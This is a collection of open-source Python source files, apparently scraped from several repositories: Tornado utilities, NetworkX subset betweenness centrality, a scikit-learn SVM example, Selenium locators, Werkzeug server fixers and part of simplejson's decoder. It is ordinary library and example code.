This will normally return the class in which it is defined.
(which is *not* necessarily the same as the cls classmethod parameter).
"""
raise NotImplementedError()
@classmethod
def configurable_default(cls):
"""Returns the implementation class to be used if none is configured."""
raise NotImplementedError()
def initialize(self):
"""Initialize a `Configurable` subclass instance.
Configurable classes should use `initialize` instead of ``__init__``.
"""
@classmethod
def configure(cls, impl, **kwargs):
"""Sets the class to use when the base class is instantiated.
Keyword arguments will be saved and added to the arguments passed
to the constructor. This can be used to set global defaults for
some parameters.
"""
base = cls.configurable_base()
if isinstance(impl, (unicode_type, bytes)):
impl = import_object(impl)
if impl is not None and not issubclass(impl, cls):
raise ValueError("Invalid subclass of %s" % cls)
base.__impl_class = impl
base.__impl_kwargs = kwargs
@classmethod
def configured_class(cls):
"""Returns the currently configured class."""
base = cls.configurable_base()
if cls.__impl_class is None:
base.__impl_class = cls.configurable_default()
return base.__impl_class
@classmethod
def _save_configuration(cls):
base = cls.configurable_base()
return (base.__impl_class, base.__impl_kwargs)
@classmethod
def _restore_configuration(cls, saved):
base = cls.configurable_base()
base.__impl_class = saved[0]
base.__impl_kwargs = saved[1]
class ArgReplacer(object):
"""Replaces one value in an ``args, kwargs`` pair.
Inspects the function signature to find an argument by name
whether it is passed by position or keyword. For use in decorators
and similar wrappers.
"""
def __init__(self, func, name):
self.name = name
try:
self.arg_pos = inspect.getargspec(func).args.index(self.name)
except ValueError:
# Not a positional parameter
self.arg_pos = None
def get_old_value(self, args, kwargs, default=None):
"""Returns the old value of the named argument without replacing it.
Returns ``default`` if the argument is not present.
"""
if self.arg_pos is not None and len(args) > self.arg_pos:
return args[self.arg_pos]
else:
return kwargs.get(self.name, default)
def replace(self, new_value, args, kwargs):
"""Replace the named argument in ``args, kwargs`` with ``new_value``.
Returns ``(old_value, args, kwargs)``. The returned ``args`` and
``kwargs`` objects may not be the same as the input objects, or
the input objects may be mutated.
If the named argument was not found, ``new_value`` will be added
to ``kwargs`` and None will be returned as ``old_value``.
"""
if self.arg_pos is not None and len(args) > self.arg_pos:
# The arg to replace is passed positionally
old_value = args[self.arg_pos]
args = list(args) # *args is normally a tuple
args[self.arg_pos] = new_value
else:
# The arg to replace is either omitted or passed by keyword.
old_value = kwargs.get(self.name)
kwargs[self.name] = new_value
return old_value, args, kwargs
def timedelta_to_seconds(td):
"""Equivalent to td.total_seconds() (introduced in python 2.7)."""
return (td.microseconds + (td.seconds + td.days * 24 * 3600) * 10 ** 6) / float(10 ** 6)
def _websocket_mask_python(mask, data):
"""Websocket masking function.
`mask` is a `bytes` object of length 4; `data` is a `bytes` object of any length.
Returns a `bytes` object of the same length as `data` with the mask applied
as specified in section 5.3 of RFC 6455.
This pure-python implementation may be replaced by an optimized version when available.
"""
mask = array.array("B", mask)
unmasked = array.array("B", data)
for i in xrange(len(data)):
unmasked[i] = unmasked[i] ^ mask[i % 4]
if hasattr(unmasked, 'tobytes'):
# tostring was deprecated in py32. It hasn't been removed,
# but since we turn on deprecation warnings in our tests
# we need to use the right one.
return unmasked.tobytes()
else:
return unmasked.tostring()
if (os.environ.get('TORNADO_NO_EXTENSION') or
os.environ.get('TORNADO_EXTENSION') == '0'):
# These environment variables exist to make it easier to do performance
# comparisons; they are not guaranteed to remain supported in the future.
_websocket_mask = _websocket_mask_python
else:
try:
from tornado.speedups import websocket_mask as _websocket_mask
except ImportError:
if os.environ.get('TORNADO_EXTENSION') == '1':
raise
_websocket_mask = _websocket_mask_python
def doctests():
import doctest
return doctest.DocTestSuite()
|
arhik/nupic
|
refs/heads/master
|
src/nupic/research/monitor_mixin/metric.py
|
50
|
# ----------------------------------------------------------------------
# Numenta Platform for Intelligent Computing (NuPIC)
# Copyright (C) 2014, Numenta, Inc. Unless you have an agreement
# with Numenta, Inc., for a separate license for this software code, the
# following terms and conditions apply:
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero Public License version 3 as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
# See the GNU Affero Public License for more details.
#
# You should have received a copy of the GNU Affero Public License
# along with this program. If not, see http://www.gnu.org/licenses.
#
# http://numenta.org/licenses/
# ----------------------------------------------------------------------
"""
Metric class used in monitor mixin framework.
"""
import numpy
class Metric(object):
"""
A metric computed over a set of data (usually from a `CountsTrace`).
"""
def __init__(self, monitor, title, data):
"""
@param monitor (MonitorMixinBase) Monitor Mixin instance that generated
this trace
@param title (string) Title
@param data (list) List of numbers to compute metric from
"""
self.monitor = monitor
self.title = title
self.min = None
self.max = None
self.sum = None
self.mean = None
self.standardDeviation = None
self._computeStats(data)
@staticmethod
def createFromTrace(trace, excludeResets=None):
data = list(trace.data)
if excludeResets is not None:
data = [x for i, x in enumerate(trace.data) if not excludeResets.data[i]]
return Metric(trace.monitor, trace.title, data)
def copy(self):
metric = Metric(self.monitor, self.title, [])
metric.min = self.min
metric.max = self.max
metric.sum = self.sum
metric.mean = self.mean
metric.standardDeviation = self.standardDeviation
return metric
def prettyPrintTitle(self):
return ("[{0}] {1}".format(self.monitor.mmName, self.title)
if self.monitor.mmName is not None else self.title)
def _computeStats(self, data):
if not len(data):
return
self.min = min(data)
self.max = max(data)
self.sum = sum(data)
self.mean = numpy.mean(data)
self.standardDeviation = numpy.std(data)
def getStats(self, sigFigs=7):
if self.mean is None:
return [None, None, None, None, None]
return [round(self.mean, sigFigs),
round(self.standardDeviation, sigFigs),
round(self.min, sigFigs),
round(self.max, sigFigs),
round(self.sum, sigFigs)]
|
dhimmel/networkx
|
refs/heads/master
|
networkx/algorithms/centrality/betweenness_subset.py
|
20
|
"""
Betweenness centrality measures for subsets of nodes.
"""
# Copyright (C) 2004-2015 by
# Aric Hagberg <hagberg@lanl.gov>
# Dan Schult <dschult@colgate.edu>
# Pieter Swart <swart@lanl.gov>
# All rights reserved.
# BSD license.
__author__ = """Aric Hagberg (hagberg@lanl.gov)"""
__all__ = ['betweenness_centrality_subset',
'edge_betweenness_centrality_subset',
'betweenness_centrality_source']
import networkx as nx
from networkx.algorithms.centrality.betweenness import\
_single_source_dijkstra_path_basic as dijkstra
from networkx.algorithms.centrality.betweenness import\
_single_source_shortest_path_basic as shortest_path
def betweenness_centrality_subset(G,sources,targets,
normalized=False,
weight=None):
"""Compute betweenness centrality for a subset of nodes.
.. math::
c_B(v) =\sum_{s\in S, t \in T} \frac{\sigma(s, t|v)}{\sigma(s, t)}
where `S` is the set of sources, `T` is the set of targets,
`\sigma(s, t)` is the number of shortest `(s, t)`-paths,
and `\sigma(s, t|v)` is the number of those paths
passing through some node `v` other than `s, t`.
If `s = t`, `\sigma(s, t) = 1`,
and if `v \in {s, t}`, `\sigma(s, t|v) = 0` [2]_.
Parameters
----------
G : graph
sources: list of nodes
Nodes to use as sources for shortest paths in betweenness
targets: list of nodes
Nodes to use as targets for shortest paths in betweenness
normalized : bool, optional
If True the betweenness values are normalized by `2/((n-1)(n-2))`
for graphs, and `1/((n-1)(n-2))` for directed graphs where `n`
is the number of nodes in G.
weight : None or string, optional
If None, all edge weights are considered equal.
Otherwise holds the name of the edge attribute used as weight.
Returns
-------
nodes : dictionary
Dictionary of nodes with betweenness centrality as the value.
See Also
--------
edge_betweenness_centrality
load_centrality
Notes
-----
The basic algorithm is from [1]_.
For weighted graphs the edge weights must be greater than zero.
Zero edge weights can produce an infinite number of equal length
paths between pairs of nodes.
The normalization might seem a little strange but it is the same
as in betweenness_centrality() and is designed to make
betweenness_centrality(G) be the same as
betweenness_centrality_subset(G,sources=G.nodes(),targets=G.nodes()).
References
----------
.. [1] Ulrik Brandes, A Faster Algorithm for Betweenness Centrality.
Journal of Mathematical Sociology 25(2):163-177, 2001.
http://www.inf.uni-konstanz.de/algo/publications/b-fabc-01.pdf
.. [2] Ulrik Brandes: On Variants of Shortest-Path Betweenness
Centrality and their Generic Computation.
Social Networks 30(2):136-145, 2008.
http://www.inf.uni-konstanz.de/algo/publications/b-vspbc-08.pdf
"""
b=dict.fromkeys(G,0.0) # b[v]=0 for v in G
for s in sources:
# single source shortest paths
if weight is None: # use BFS
S,P,sigma=shortest_path(G,s)
else: # use Dijkstra's algorithm
S,P,sigma=dijkstra(G,s,weight)
b=_accumulate_subset(b,S,P,sigma,s,targets)
b=_rescale(b,len(G),normalized=normalized,directed=G.is_directed())
return b
def edge_betweenness_centrality_subset(G,sources,targets,
normalized=False,
weight=None):
"""Compute betweenness centrality for edges for a subset of nodes.
.. math::
c_B(v) =\sum_{s\in S,t \in T} \frac{\sigma(s, t|e)}{\sigma(s, t)}
where `S` is the set of sources, `T` is the set of targets,
`\sigma(s, t)` is the number of shortest `(s, t)`-paths,
and `\sigma(s, t|e)` is the number of those paths
passing through edge `e` [2]_.
Parameters
----------
G : graph
A networkx graph
sources: list of nodes
Nodes to use as sources for shortest paths in betweenness
targets: list of nodes
Nodes to use as targets for shortest paths in betweenness
normalized : bool, optional
If True the betweenness values are normalized by `2/(n(n-1))`
for graphs, and `1/(n(n-1))` for directed graphs where `n`
is the number of nodes in G.
weight : None or string, optional
If None, all edge weights are considered equal.
Otherwise holds the name of the edge attribute used as weight.
Returns
-------
edges : dictionary
Dictionary of edges with Betweenness centrality as the value.
See Also
--------
betweenness_centrality
edge_load
Notes
-----
The basic algorithm is from [1]_.
For weighted graphs the edge weights must be greater than zero.
Zero edge weights can produce an infinite number of equal length
paths between pairs of nodes.
The normalization might seem a little strange but it is the same
as in edge_betweenness_centrality() and is designed to make
edge_betweenness_centrality(G) be the same as
edge_betweenness_centrality_subset(G,sources=G.nodes(),targets=G.nodes()).
References
----------
.. [1] Ulrik Brandes, A Faster Algorithm for Betweenness Centrality.
Journal of Mathematical Sociology 25(2):163-177, 2001.
http://www.inf.uni-konstanz.de/algo/publications/b-fabc-01.pdf
.. [2] Ulrik Brandes: On Variants of Shortest-Path Betweenness
Centrality and their Generic Computation.
Social Networks 30(2):136-145, 2008.
http://www.inf.uni-konstanz.de/algo/publications/b-vspbc-08.pdf
"""
b=dict.fromkeys(G,0.0) # b[v]=0 for v in G
b.update(dict.fromkeys(G.edges(),0.0)) # b[e] for e in G.edges()
for s in sources:
# single source shortest paths
if weight is None: # use BFS
S,P,sigma=shortest_path(G,s)
else: # use Dijkstra's algorithm
S,P,sigma=dijkstra(G,s,weight)
b=_accumulate_edges_subset(b,S,P,sigma,s,targets)
for n in G: # remove nodes to only return edges
del b[n]
b=_rescale_e(b,len(G),normalized=normalized,directed=G.is_directed())
return b
# obsolete name
def betweenness_centrality_source(G,normalized=True,weight=None,sources=None):
if sources is None:
sources=G.nodes()
targets=G.nodes()
return betweenness_centrality_subset(G,sources,targets,normalized,weight)
def _accumulate_subset(betweenness,S,P,sigma,s,targets):
delta=dict.fromkeys(S,0)
target_set=set(targets)
while S:
w=S.pop()
for v in P[w]:
if w in target_set:
delta[v]+=(sigma[v]/sigma[w])*(1.0+delta[w])
else:
delta[v]+=delta[w]/len(P[w])
if w != s:
betweenness[w]+=delta[w]
return betweenness
def _accumulate_edges_subset(betweenness,S,P,sigma,s,targets):
delta=dict.fromkeys(S,0)
target_set=set(targets)
while S:
w=S.pop()
for v in P[w]:
if w in target_set:
c=(sigma[v]/sigma[w])*(1.0+delta[w])
else:
c=delta[w]/len(P[w])
if (v,w) not in betweenness:
betweenness[(w,v)]+=c
else:
betweenness[(v,w)]+=c
delta[v]+=c
if w != s:
betweenness[w]+=delta[w]
return betweenness
def _rescale(betweenness,n,normalized,directed=False):
if normalized is True:
if n <=2:
scale=None # no normalization b=0 for all nodes
else:
scale=1.0/((n-1)*(n-2))
else: # rescale by 2 for undirected graphs
if not directed:
scale=1.0/2.0
else:
scale=None
if scale is not None:
for v in betweenness:
betweenness[v] *= scale
return betweenness
def _rescale_e(betweenness,n,normalized,directed=False):
if normalized is True:
if n <=1:
scale=None # no normalization b=0 for all nodes
else:
scale=1.0/(n*(n-1))
else: # rescale by 2 for undirected graphs
if not directed:
scale=1.0/2.0
else:
scale=None
if scale is not None:
for v in betweenness:
betweenness[v] *= scale
return betweenness
|
memtoko/django
|
refs/heads/master
|
tests/i18n/other/locale/de/__init__.py
|
12133432
| |
GunnerJnr/_CodeInstitute
|
refs/heads/master
|
Stream-3/Full-Stack-Development/2.Hello-Django-Templates/3.Template-Inheritance/hello_django/HelloWorld_prj/HelloWorld_app/__init__.py
|
12133432
| |
rahuldhote/scikit-learn
|
refs/heads/master
|
examples/svm/plot_svm_nonlinear.py
|
268
|
"""
==============
Non-linear SVM
==============
Perform binary classification using non-linear SVC
with RBF kernel. The target to predict is a XOR of the
inputs.
The color map illustrates the decision function learned by the SVC.
"""
print(__doc__)
import numpy as np
import matplotlib.pyplot as plt
from sklearn import svm
xx, yy = np.meshgrid(np.linspace(-3, 3, 500),
np.linspace(-3, 3, 500))
np.random.seed(0)
X = np.random.randn(300, 2)
Y = np.logical_xor(X[:, 0] > 0, X[:, 1] > 0)
# fit the model
clf = svm.NuSVC()
clf.fit(X, Y)
# plot the decision function for each datapoint on the grid
Z = clf.decision_function(np.c_[xx.ravel(), yy.ravel()])
Z = Z.reshape(xx.shape)
plt.imshow(Z, interpolation='nearest',
extent=(xx.min(), xx.max(), yy.min(), yy.max()), aspect='auto',
origin='lower', cmap=plt.cm.PuOr_r)
contours = plt.contour(xx, yy, Z, levels=[0], linewidths=2,
linetypes='--')
plt.scatter(X[:, 0], X[:, 1], s=30, c=Y, cmap=plt.cm.Paired)
plt.xticks(())
plt.yticks(())
plt.axis([-3, 3, -3, 3])
plt.show()
|
teemulehtinen/a-plus
|
refs/heads/master
|
selenium_test/test/locators.py
|
2
|
from selenium.webdriver.common.by import By
class LoginPageLocators(object):
BANNER = (By.XPATH, "//*[@class='page-header']/h1[contains(text(), 'Login')]")
USERNAME_INPUT = (By.XPATH, "//input[@id='id_username']")
PASSWORD_INPUT = (By.XPATH, "//input[@id='id_password']")
SUBMIT_BUTTON = (By.XPATH, "//*[@type='submit']")
class FirstPageLocators(object):
BANNER = (By.XPATH, "//*[@class='page-header']/h1")
APLUS_TEST_COURSE_INSTANCE_BUTTON = (By.XPATH, "//h3/a[contains(@href, '/aplus1/basic_instance/')]")
HOOK_EXAMPLE_BUTTON = (By.XPATH, "//h3/a[contains(@href, '/aplus1/hook_instance/')]")
class BasePageLocators(object):
COURSE_BANNER = (By.XPATH, "//*[@id='bs-navbar-collapse']/ul[1]/li[1]/a")
FOOTER = (By.XPATH, "//nav[contains(@class, 'site-footer')]")
HOME_LINK = (By.XPATH, "//*[contains(@class, 'course-menu')]/ul/li[contains(@class, 'menu-home')]/a")
CALENDAR_FEED_LINK = (By.XPATH, "//*[contains(@class, 'calendar-view')]/p/a[contains(@href, '/export-calendar/')]")
RESULTS_LINK = (By.XPATH, "//*[contains(@class, 'course-menu')]/ul/li[contains(@class, 'menu-results')]/a")
USER_LINK = (By.XPATH, "//*[contains(@class, 'course-menu')]/ul/li[contains(@class, 'menu-notifications')]/a")
TEACHERS_VIEW_LINK = (By.XPATH, "//*[contains(@class, 'course-menu')]/ul/li[contains(@class, 'menu-edit-course')]/a")
LOGGED_USER_LINK = (By.XPATH, "//*[contains(@class, 'user-menu')]/li[contains(@class, 'menu-profile')]/a")
LOGOUT_LINK = (By.XPATH, "//*[contains(@class, 'user-menu')]/li/a[contains(@href, '/accounts/logout/')]")
LOGOUT_BANNER = (By.XPATH, "//div[contains(@class, 'alert alert-success')]")
WARNING_BANNER = (By.XPATH, "//div[contains(@class, 'alert alert-warning')]")
NOTIFICATION_ALERT = (By.XPATH, "//*[contains(@class, 'menu-notification')]//span[contains(@class, 'badge-danger')]")
class HomePageLocators(object):
MAIN_SCORE = (By.XPATH, "//div[contains(@class, 'well')]/p/strong[contains(@class, 'h2')]")
class ExercisePageLocators(object):
MAIN_TITLE = (By.XPATH, "//*[@id='title']")
EXERCISE_SCORE = (By.XPATH, "//*[@id='exercise-info']/div[@class='well']/p/strong[contains(@class, 'h2')]")
NUMBER_OF_SUBMITTERS = (By.XPATH, "//*[@id='exercise-info']//dl/dd[contains(@class, 'exercise-info-submitters')]")
ALLOWED_SUBMISSIONS = (By.XPATH, "//*[@id='exercise-info']//dl/dd[contains(@class, 'exercise-info-submissions')]")
MY_SUBMISSIONS_LIST = (By.XPATH, "//li[contains(@class, 'menu-submission')]/ul[@class='dropdown-menu']/li")
RECEIVED_BANNER = (By.XPATH, "//*[contains(@class, 'alert')]")
class CourseArchiveLocators(object):
APLUS_LINK = (By.XPATH, "//*[@id='course1']/ul/li/a[contains(@href, '/aplus1/basic_instance/')]")
HOOK_LINK = (By.XPATH, "//*[@id='course1']/ul/li/a[contains(@href, '/aplus1/hook_instance/')]")
class StaffPageLocators(object):
SUBMISSION_LINKS = (By.XPATH, "//a[@href='/aplus1/basic_instance/first-exercise-round/1/submissions/']")
class TeachersPageLocators(object):
TEACHERS_VIEW_BANNER = (By.XPATH, "//ol[@class='breadcrumb']/li[@class='active' and contains(text(), 'Edit course')]")
EDIT_LEARNING_MODULE_LINKS = (By.XPATH, "//a[contains(@href,'/aplus1/basic_instance/teachers/exercise/1/')]")
REMOVE_LEARNING_MODULE_LINKS = (By.XPATH, "//a[contains(@href,'/aplus1/basic_instance/teachers/exercise/1/delete/')]")
class EditModulePageLocators(object):
EDIT_MODULE_PAGE_BANNER = (By.XPATH, "//ol[@class='breadcrumb']/li[@class='active' and contains(text(), 'Edit module')]")
COURSE_NAME_INPUT = (By.XPATH, "//*[@id='id_name']")
POINTS_TO_PASS_INPUT = (By.XPATH, "//*[@id='id_points_to_pass']")
OPENING_TIME_INPUT = (By.XPATH, "//*[@id='id_opening_time']")
CLOSING_TIME_INPUT = (By.XPATH, "//*[@id='id_closing_time']")
SUBMIT_BUTTON = (By.XPATH, "//form//*[@type='submit']")
SUCCESSFUL_SAVE_BANNER = (By.XPATH, "//div[contains(@class, 'site-content')]/div[contains(@class, 'alert alert-success')]")
class EditExercisePageLocators(object):
EDIT_EXERCISE_PAGE_BANNER = (By.XPATH, "//ol[@class='breadcrumb']/li[@class='active' and contains(text(), 'Edit learning object')]")
EXERCISE_NAME_INPUT = (By.XPATH, "//*[@id='id_name']")
MAX_SUBMISSIONS_INPUT = (By.XPATH, "//*[@id='id_max_submissions']")
MAX_POINTS_INPUT = (By.XPATH, "//*[@id='id_max_points']")
POINTS_TO_PASS_INPUT = (By.XPATH, "//*[@id='id_points_to_pass']")
SUBMIT_BUTTON = (By.XPATH, "//form//*[@type='submit']")
SUCCESSFUL_SAVE_BANNER = (By.XPATH, "//div[contains(@class, 'site-content')]/div[contains(@class, 'alert alert-success')]")
class SubmissionPageLocators(object):
SUBMISSIONS_PAGE_BANNER = (By.XPATH, "//ol[@class='breadcrumb']/li[@class='active' and contains(text(), 'All submissions')]")
INSPECTION_LINKS = (By.XPATH, "//table//a[contains(@href, '/inspect/')]")
class StudentFeedbackPageLocators(object):
ASSISTANT_FEEDBACK_LABEL = (By.XPATH, "//h4[text()='Assistant feedback']")
ASSISTANT_FEEDBACK_TEXT = (By.XPATH, "//blockquote")
FEEDBACK_TEXT = (By.XPATH, "//*[@id='exercise']")
class InspectionPageLocators(object):
ASSESS_THIS_SUBMISSION_LINK = (By.XPATH, "//*a[contains(@href, '/aplus1/basic_instance/exercises/1/submissions/7/assess/')]")
NO_FEEDBACK_BANNER = (By.XPATH, "//div[@class='alert alert-info']")
SUBMITTERS_TEXT = (By.XPATH, "//div[@class='panel-body']/dl/dd[1]")
GRADE_TEXT = (By.XPATH, "//div[@class='panel-body']/dl/dd[4]")
class AssessmentPageLocators(object):
POINTS_INPUT = (By.XPATH, "//*[@id='id_points']")
ASSISTANT_FEEDBACK_INPUT = (By.XPATH, "//*[@id='id_assistant_feedback']")
FEEDBACK_INPUT = (By.XPATH, "//*[@id='id_feedback']")
SAVE_BUTTON = (By.XPATH, "//form//*[@type='submit']")
class MyFirstExerciseLocators(object):
MAIN_TITLE = (By.XPATH, "//*[@id='title'][contains(text(), 'My first exercise')]")
TEXT_INPUT = (By.XPATH, "//*[@id='exercise-page-content']/form//textarea")
SUBMIT_BUTTON = (By.XPATH, "//*[@id='exercise-page-content']/form//input[@type='submit']")
class FileUploadGraderLocators(object):
MAIN_TITLE = (By.XPATH, "//*[@id='title'][contains(text(), 'File exercise')]")
BROWSE_BUTTON = (By.XPATH, "//*[@id='myfile_id']")
SUBMIT_BUTTON = (By.XPATH, "//*[@id='exercise-page-content']/form//input[@type='submit']")
class MyAjaxExerciseGraderLocators(object):
MAIN_TITLE = (By.XPATH, "//*[@id='title'][contains(text(), 'My AJAX exercise')]")
TEXT_INPUT = (By.XPATH, "//*[@id='form']//input[@type='number']")
SUBMIT_BUTTON = (By.XPATH, "//*[@id='form']//input[@type='submit']")
|
postlund/home-assistant
|
refs/heads/dev
|
homeassistant/components/enigma2/__init__.py
|
37
|
"""Support for Enigma2 devices."""
|
maxhawkins/random_diet_club
|
refs/heads/master
|
lib/werkzeug/contrib/fixers.py
|
4
|
# -*- coding: utf-8 -*-
"""
werkzeug.contrib.fixers
~~~~~~~~~~~~~~~~~~~~~~~
.. versionadded:: 0.5
This module includes various helpers that fix bugs in web servers. They may
be necessary for some versions of a buggy web server but not others. We try
to stay updated with the status of the bugs as good as possible but you have
to make sure whether they fix the problem you encounter.
If you notice bugs in webservers not fixed in this module consider
contributing a patch.
:copyright: Copyright 2009 by the Werkzeug Team, see AUTHORS for more details.
:license: BSD, see LICENSE for more details.
"""
try:
from urllib import unquote
except ImportError:
from urllib.parse import unquote
from werkzeug.http import parse_options_header, parse_cache_control_header, \
parse_set_header
from werkzeug.useragents import UserAgent
from werkzeug.datastructures import Headers, ResponseCacheControl
class CGIRootFix(object):
"""Wrap the application in this middleware if you are using FastCGI or CGI
and you have problems with your app root being set to the cgi script's path
instead of the path users are going to visit
.. versionchanged:: 0.9
Added `app_root` parameter and renamed from `LighttpdCGIRootFix`.
:param app: the WSGI application
:param app_root: Defaulting to ``'/'``, you can set this to something else
if your app is mounted somewhere else.
"""
def __init__(self, app, app_root='/'):
self.app = app
self.app_root = app_root
def __call__(self, environ, start_response):
# only set PATH_INFO for older versions of Lighty or if no
# server software is provided. That's because the test was
# added in newer Werkzeug versions and we don't want to break
# people's code if they are using this fixer in a test that
# does not set the SERVER_SOFTWARE key.
if 'SERVER_SOFTWARE' not in environ or \
environ['SERVER_SOFTWARE'] < 'lighttpd/1.4.28':
environ['PATH_INFO'] = environ.get('SCRIPT_NAME', '') + \
environ.get('PATH_INFO', '')
environ['SCRIPT_NAME'] = self.app_root.strip('/')
return self.app(environ, start_response)
# backwards compatibility
LighttpdCGIRootFix = CGIRootFix
class PathInfoFromRequestUriFix(object):
"""On windows environment variables are limited to the system charset
which makes it impossible to store the `PATH_INFO` variable in the
environment without loss of information on some systems.
This is for example a problem for CGI scripts on a Windows Apache.
This fixer works by recreating the `PATH_INFO` from `REQUEST_URI`,
`REQUEST_URL`, or `UNENCODED_URL` (whatever is available). Thus the
fix can only be applied if the webserver supports either of these
variables.
:param app: the WSGI application
"""
def __init__(self, app):
self.app = app
def __call__(self, environ, start_response):
for key in 'REQUEST_URL', 'REQUEST_URI', 'UNENCODED_URL':
if key not in environ:
continue
request_uri = unquote(environ[key])
script_name = unquote(environ.get('SCRIPT_NAME', ''))
if request_uri.startswith(script_name):
environ['PATH_INFO'] = request_uri[len(script_name):] \
.split('?', 1)[0]
break
return self.app(environ, start_response)
class ProxyFix(object):
"""This middleware can be applied to add HTTP proxy support to an
application that was not designed with HTTP proxies in mind. It
sets `REMOTE_ADDR`, `HTTP_HOST` from `X-Forwarded` headers. While
Werkzeug-based applications already can use
:py:func:`werkzeug.wsgi.get_host` to retrieve the current host even if
behind proxy setups, this middleware can be used for applications which
access the WSGI environment directly.
If you have more than one proxy server in front of your app, set
`num_proxies` accordingly.
Do not use this middleware in non-proxy setups for security reasons.
The original values of `REMOTE_ADDR` and `HTTP_HOST` are stored in
the WSGI environment as `werkzeug.proxy_fix.orig_remote_addr` and
`werkzeug.proxy_fix.orig_http_host`.
:param app: the WSGI application
:param num_proxies: the number of proxy servers in front of the app.
"""
def __init__(self, app, num_proxies=1):
self.app = app
self.num_proxies = num_proxies
def get_remote_addr(self, forwarded_for):
"""Selects the new remote addr from the given list of ips in
X-Forwarded-For. By default it picks the one that the `num_proxies`
proxy server provides. Before 0.9 it would always pick the first.
.. versionadded:: 0.8
"""
if len(forwarded_for) >= self.num_proxies:
return forwarded_for[-1 * self.num_proxies]
def __call__(self, environ, start_response):
getter = environ.get
forwarded_proto = getter('HTTP_X_FORWARDED_PROTO', '')
forwarded_for = getter('HTTP_X_FORWARDED_FOR', '').split(',')
forwarded_host = getter('HTTP_X_FORWARDED_HOST', '')
environ.update({
'werkzeug.proxy_fix.orig_wsgi_url_scheme': getter('wsgi.url_scheme'),
'werkzeug.proxy_fix.orig_remote_addr': getter('REMOTE_ADDR'),
'werkzeug.proxy_fix.orig_http_host': getter('HTTP_HOST')
})
forwarded_for = [x for x in [x.strip() for x in forwarded_for] if x]
remote_addr = self.get_remote_addr(forwarded_for)
if remote_addr is not None:
environ['REMOTE_ADDR'] = remote_addr
if forwarded_host:
environ['HTTP_HOST'] = forwarded_host
if forwarded_proto:
environ['wsgi.url_scheme'] = forwarded_proto
return self.app(environ, start_response)
class HeaderRewriterFix(object):
"""This middleware can remove response headers and add others. This
is for example useful to remove the `Date` header from responses if you
are using a server that adds that header, no matter if it's present or
not or to add `X-Powered-By` headers::
app = HeaderRewriterFix(app, remove_headers=['Date'],
add_headers=[('X-Powered-By', 'WSGI')])
:param app: the WSGI application
:param remove_headers: a sequence of header keys that should be
removed.
:param add_headers: a sequence of ``(key, value)`` tuples that should
be added.
"""
def __init__(self, app, remove_headers=None, add_headers=None):
self.app = app
self.remove_headers = set(x.lower() for x in (remove_headers or ()))
self.add_headers = list(add_headers or ())
def __call__(self, environ, start_response):
def rewriting_start_response(status, headers, exc_info=None):
new_headers = []
for key, value in headers:
if key.lower() not in self.remove_headers:
new_headers.append((key, value))
new_headers += self.add_headers
return start_response(status, new_headers, exc_info)
return self.app(environ, rewriting_start_response)
class InternetExplorerFix(object):
"""This middleware fixes a couple of bugs with Microsoft Internet
Explorer. Currently the following fixes are applied:
- removing of `Vary` headers for unsupported mimetypes which
causes troubles with caching. Can be disabled by passing
``fix_vary=False`` to the constructor.
see: http://support.microsoft.com/kb/824847/en-us
- removes offending headers to work around caching bugs in
Internet Explorer if `Content-Disposition` is set. Can be
disabled by passing ``fix_attach=False`` to the constructor.
If it does not detect affected Internet Explorer versions it won't touch
the request / response.
"""
# This code was inspired by Django fixers for the same bugs. The
# fix_vary and fix_attach fixers were originally implemented in Django
# by Michael Axiak and is available as part of the Django project:
# http://code.djangoproject.com/ticket/4148
def __init__(self, app, fix_vary=True, fix_attach=True):
self.app = app
self.fix_vary = fix_vary
self.fix_attach = fix_attach
def fix_headers(self, environ, headers, status=None):
if self.fix_vary:
header = headers.get('content-type', '')
mimetype, options = parse_options_header(header)
if mimetype not in ('text/html', 'text/plain', 'text/sgml'):
headers.pop('vary', None)
if self.fix_attach and 'content-disposition' in headers:
pragma = parse_set_header(headers.get('pragma', ''))
pragma.discard('no-cache')
header = pragma.to_header()
if not header:
headers.pop('pragma', '')
else:
headers['Pragma'] = header
header = headers.get('cache-control', '')
if header:
cc = parse_cache_control_header(header,
cls=ResponseCacheControl)
cc.no_cache = None
cc.no_store = False
header = cc.to_header()
if not header:
headers.pop('cache-control', '')
else:
headers['Cache-Control'] = header
def run_fixed(self, environ, start_response):
def fixing_start_response(status, headers, exc_info=None):
headers = Headers(headers)
self.fix_headers(environ, headers, status)
return start_response(status, headers.to_wsgi_list(), exc_info)
return self.app(environ, fixing_start_response)
def __call__(self, environ, start_response):
ua = UserAgent(environ)
if ua.browser != 'msie':
return self.app(environ, start_response)
return self.run_fixed(environ, start_response)
|
liefdiy/bite-project
|
refs/heads/master
|
deps/mrtaskman/server/mapreduce/lib/simplejson/decoder.py
|
77
|
#!/usr/bin/env python
"""Implementation of JSONDecoder
"""
import re
import sys
import struct
from mapreduce.lib.simplejson.scanner import make_scanner
try:
from mapreduce.lib.simplejson._speedups import scanstring as c_scanstring
except ImportError:
c_scanstring = None
__all__ = ['JSONDecoder']
FLAGS = re.VERBOSE | re.MULTILINE | re.DOTALL
def _floatconstants():
_BYTES = '7FF80000000000007FF0000000000000'.decode('hex')
if sys.byteorder != 'big':
_BYTES = _BYTES[:8][::-1] + _BYTES[8:][::-1]
nan, inf = struct.unpack('dd', _BYTES)
return nan, inf, -inf
NaN, PosInf, NegInf = _floatconstants()
def linecol(doc, pos):
lineno = doc.count('\n', 0, pos) + 1
if lineno == 1:
colno = pos
else:
colno = pos - doc.rindex('\n', 0, pos)
return lineno, colno
def errmsg(msg, doc, pos, end=None):
# Note that this function is called from _speedups
lineno, colno = linecol(doc, pos)
if end is None:
return '%s: line %d column %d (char %d)' % (msg, lineno, colno, pos)
endlineno, endcolno = linecol(doc, end)
return '%s: line %d column %d - line %d column %d (char %d - %d)' % (
msg, lineno, colno, endlineno, endcolno, pos, end)
_CONSTANTS = {
'-Infinity': NegInf,
'Infinity': PosInf,
'NaN': NaN,
}
STRINGCHUNK = re.compile(r'(.*?)(["\\\x00-\x1f])', FLAGS)
BACKSLASH = {
'"': u'"', '\\': u'\\', '/': u'/',
'b': u'\b', 'f': u'\f', 'n': u'\n', 'r': u'\r', 't': u'\t',
}
DEFAULT_ENCODING = "utf-8"
def py_scanstring(s, end, encoding=None, strict=True, _b=BACKSLASH, _m=STRINGCHUNK.match):
if encoding is None:
encoding = DEFAULT_ENCODING
chunks = []
